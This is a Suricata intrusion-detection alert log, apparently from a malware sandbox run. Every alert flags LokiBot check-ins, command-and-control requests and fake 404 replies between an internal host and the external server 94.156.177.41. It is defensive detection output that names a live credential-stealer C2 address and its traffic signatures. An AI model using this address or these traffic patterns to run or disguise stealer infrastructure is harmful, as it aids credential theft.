Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49925 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49925 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49925 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49768
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49930 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49930 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49930 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49925 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49925 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49925
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49930 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49930 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49861 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49861 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49920 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49740
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49761 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49766
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49920 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49906 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49741
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49762
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49930
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49799 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49861 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49799 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49824 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49824 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49886
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49778 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49778 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49778 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49805
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49920 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49799 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49845 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49845 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49891 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49824 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49799 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49761
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49818 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49912 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49818 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49912 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49845 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49818 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49891 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49891 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49896 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49891 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49896 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49891 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49906 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49818 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49818 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49906 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49778 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49778 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49799 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49816 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49845 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49896 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49896 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49896 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49896
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49776 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49776 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49776 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49776 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49776 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49776
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49881 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49881 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49881 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49793 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49793 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49881 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49881 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49743
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49906 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49881
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49824 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49891
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49778
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49946 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49946 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49816 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49946 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49816 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49912 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49912 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49946 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49906
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49818
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49845 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49757
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49824
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49799
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49912
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49816 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49861 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49816 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49861 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49946 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49775
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49845
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49816
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49772 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49920
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49792 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49772 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49946
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49772 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49792 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49875 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49875 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49875 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49792 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49861
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49875 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49875 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49792 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49792 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49772 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49793 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49916 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49916 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49772 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49936 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49875
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49793 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49793 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49916 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49792
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49772
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49829
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49936 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49916 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49850 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49850 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49936 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49916 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49850 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49770 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49770 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49793
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49770 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49850 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49850 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49936 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49770 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49936 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49850
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49941 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49770 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49916
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49941 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49941 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49770
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49941 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49941 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49936
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49941
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49950 -> 94.156.177.41:80
